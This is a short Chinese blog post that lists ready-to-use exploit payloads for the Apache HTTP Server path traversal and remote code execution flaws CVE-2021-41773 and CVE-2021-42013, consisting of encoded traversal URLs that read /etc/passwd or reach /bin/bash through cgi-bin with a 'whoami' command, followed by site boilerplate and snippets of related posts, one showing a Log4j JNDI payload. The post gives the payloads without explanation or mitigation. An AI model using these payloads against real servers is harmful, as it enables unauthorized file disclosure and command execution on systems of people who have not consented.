Apache漏洞——CVE-2021-41773\CVE-2021-42013

最新推荐文章于 2024-08-05 23:59:43 发布

Aaron_Jㅤ

最新推荐文章于 2024-08-05 23:59:43 发布

阅读量72

点赞数 2

文章标签：服务器 linux 运维

本文链接：https://blog.csdn.net/weixin_57379923/article/details/140895543

版权

CVE-2021-41773

/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash

echo;whoami

CVE-2021-42013

/icons/%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65/etc/passwd

/cgi-bin/%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65/bin/bash
echo;whoami

作者：PeiyuJue
链接： Apache漏洞——CVE-2021-41773\CVE-2021-42013 – Candid Chronicles
来源：Aaron的博客
版权声明：本博客所有文章除特别声明外，均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有，未经允许请勿转载！

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Aaron_Jㅤ

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Apache漏洞——CVE-2021-41773\CVE-2021-42013

【代码】Apache漏洞——CVE-2021-41773\CVE-2021-42013。
复制链接

扫一扫

Confluence漏洞学习——CVE-2021-26084/85，CVE-2022-26134漏洞复现

记录并分享学习安全的知识点..

07-24

2911

Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具，通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下，可构造OGNL表达式进行注入，实现在 Confluence Server或Data Center上执行任意代码。 .........

Apache——CVE-2021-41773

qq_45770644的博客

10-06

3704

前言： Apache Software 已迅速发布了针对 Apache HTTP Server 中的零日安全漏洞的修复程序，该漏洞于上周首次报告给该项目。该漏洞正在野外被积极利用，它表示，并可能允许攻击者访问敏感信息。 CVE-2021-41773可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web 服务器上的文件，方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。该问题仅影响 Apache 开源 Web 服务器的 2.4.49.

参与评论您还未登录，请先登录后发表或查看评论

Apache HTTP Server路径遍历漏洞复现0day（CVE-2021-41773|CVE-2021-42013远程代码执行）

good good study

10-09

5359

声明：请勿用于非法入侵，仅供检测与学习！传送门 ——>中华人民共和国网络安全法漏洞描述在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。如果文档根目录之外的文件不受“要求全部拒绝”的保护，则这些请求可能会成功。此外，此缺陷可能会泄漏 CGI 脚本等解释文件的来源。已知此问题已被广泛利用。此问题仅影响 Apache 2.4.49 而不是早期版本。 fofa查询：server=.

CVE-2021-41773 CVE-2021-42013——Apache HTTP Server路径遍历远程代码执行

2301_82241775的博客

05-16

335

Python编程学习，学习内容包含：语法、正则、文件、网络、多线程等常用库，推荐《Python核心编程》，不要看完；在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护，则这些请求可能会成功。恭喜你，如果学到这里，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web 渗透、安全服务、安全分析等岗位；

CVE-2021-42013 Apache HTTP Server 路径穿越漏洞——漏洞复现

qq_60905276的博客

06-07

4848

Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞，称为 CVE-2021-41773。

CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行

LiBai'S BLOG

11-13

8678

https://66.175.213.123/etc/passwd 请求包 GET https://66.175.213.123//icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: 66.175.213.123 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,applica

Apache Druid RCE(CVE-2021-25646)复现附漏洞检测POC

good good study

02-26

6983

目录漏洞简介影响版本 docker-compose一键搭建漏洞环境漏洞复现 1. 用DNSlog探测远程命令执行 2. 反弹shell 漏洞检测POC 漏洞简介 Apache Druid：Apache Druid是一个专为大数据集的快速切片分析（OLAP查询）而设计的实时分析数据库。Druid作为数据库，最常用于支持以下用例：实时摄取、快速查询和高运行时长。例如，Druid一般用于支持分析型应用程序的GUI，或是需要快速聚合的高并发API后台。Druid最适合用于面向事件的数据。

CVE-2021-36749——Apache Druid LoadData 任意文件读取漏洞

LiBai'S BLOG

11-26

1万+

CVE-2021-36749漏洞原理影响版本fofa语法漏洞测试POC修复方法漏洞原理由于用户指定 HTTP InputSource 没有做出限制，可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下是缺乏授权认证，攻击者可利用该漏洞在未授权情况下，构造恶意请求执行文件读取，最终造成服务器敏感性信息泄露。影响版本 Apache Druid Version < 0.22 fofa语法 title="Apache

CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现

热门推荐

LiBai'S BLOG

01-05

2万+

这里写目录标题VuofocusDnslog出网测试JNDI注入反弹shell Vuofocus http://vulfocus.fofa.so/ 启动靶场 Dnslog出网测试 http://www.dnslog.cn/ payload GET方式提交 payload payload=${jndi:ldap://X.X.X.X/exp} payload=${jndi:ldap://5e0s0v.dnslog.cn/exp} 用payload打的时候发现服务器返回404 原因是因为GET数据传输

动态加载第三方库——dlopen

qq_43587345的博客

08-02

330

dlopen是一个 POSIX 标准的函数，用于在程序运行时动态加载共享库（动态库）并返回一个句柄，以便后续对库中函数的调用。在 C 语言中，使用dlopen函数可以实现动态加载和调用动态库中的函数，这在插件系统或者需要动态加载库的情况下非常有用。

Linux手动编译方式安装httpd及配置系统服务（含不同安装方式简介）

shyuu的博客

08-04

729

Linux手动编译方式安装httpd及配置系统服务。包括几种软件安装方式的优缺点。手动编译安装方式相较其他方式有灵活性高、版本控制自由、依赖管理可控的优点等。

大宽带服务器有什么优势

athena1999的博客

08-05

302

从属性上看，大宽带可以分为G口大带宽、万兆大带宽等，从线路上看，可以分为电信、移动、联通等，从地域属性看，可以分为国内宽带、国际宽带。单位时间内能够在线路上传送的数据量，带宽越大，支持在线传送的数据量就越大。在用户访问高峰期时，如果网站没有足够的宽带提供，会出现网站卡顿的情况，加载速度慢，画质不清晰等情况，更严重的能会导致服务器瘫痪，使用大宽带可以完美规避这些。当下的网站内容大多由视频、音频、图片、文字构成，且数量也比较大，流量消耗也比就比较大，大宽带服务器可以很好的解决这点。大宽带服务器有什么优势。

基础进阶-搭建pxe网络安装环境实现服务器自动部署

qq_64227183的博客

08-05

254

搭建pxe网络安装环境实现服务器自动部署

PXE网络部署/服务器自动部署

weixin_72619261的博客

08-05

288

PXE网络搭建，自动化部署服务器系统

云原生-搭建pxe网络安装环境实现服务器自动部署

最新发布

2301_77475090的博客

08-05

238

【代码】云原生-搭建pxe网络安装环境实现服务器自动部署。

部署服务器项目及发布

zhongli_的博客

08-05

430

当技术总监直接丢给我一个服务器账号密码时，我该怎么完成映射本机；配置网关；配置代理和发布项目呢？我使用的是putty远程登录到服务器输入ip后，点open输入账号密码登录的账号如果不是root；使用sudo su切换到root账号；再用命令cd /到根目录。

基于RHEL7的服务器批量安装

LongHongYu908的博客

08-05

342

6.修改/var/lib/tftpboot/pxelinux.cfg/default。5.修改/etc/dhcp/dhcpd.conf 添加访问主机和要读取的文件。4.到 /var/lib/tftpboot/建立数据目录数据文件。3.修改配置文件 /etc/dhcp/dhcpd.conf。9.安装之后运行的脚本（这里配置了本地仓库并安装gcc）1.安装图形化生成kickstart自动化安装脚本工具。11.打开脚本添加要安装的软件（这里安装httpd）4.安装源（使用网络源安装）1.安装DHCP服务。

游戏行业需要选择什么样的服务器租用呢？

wanhengwangluo的博客

08-05

215

对单机小游戏，只需要提供一个单独的局域网内的计算机来进行游戏运行，通常需要有独立的网络环境才能够保证游戏正常运行，同时单机游戏也会分为单IP与多IP服务器；随着互联网科技的快速发展，游戏网络行业也逐渐兴起，网络游戏也有着不同的形式，比如大型的网络游戏、单机小游戏与网页游戏等，而在这些网络娱乐游戏活动的背后，支撑游戏玩家良好体验感的主要是各种各样的服务器。当网络游戏想要长久的运行下去，则需要有着大量的游戏玩家进行支持，能够给玩家提供良好的游戏体验感，所以游戏公司需要选择高性能且高性价比的服务器租用。

F5 BIG-IP IQ 2021漏洞CVE-2021-22986：远程代码执行风险

### CVE-2021-22986: F5 BIG-IP-IQ 的远程代码执行漏洞分析 **背景**： CVE-2021-22986是一个针对F5 BIG-IP设备及其附属产品BIG-IP IQ（Intelligence Query）的安全漏洞。该漏洞允许攻击者通过不安全的API调用，...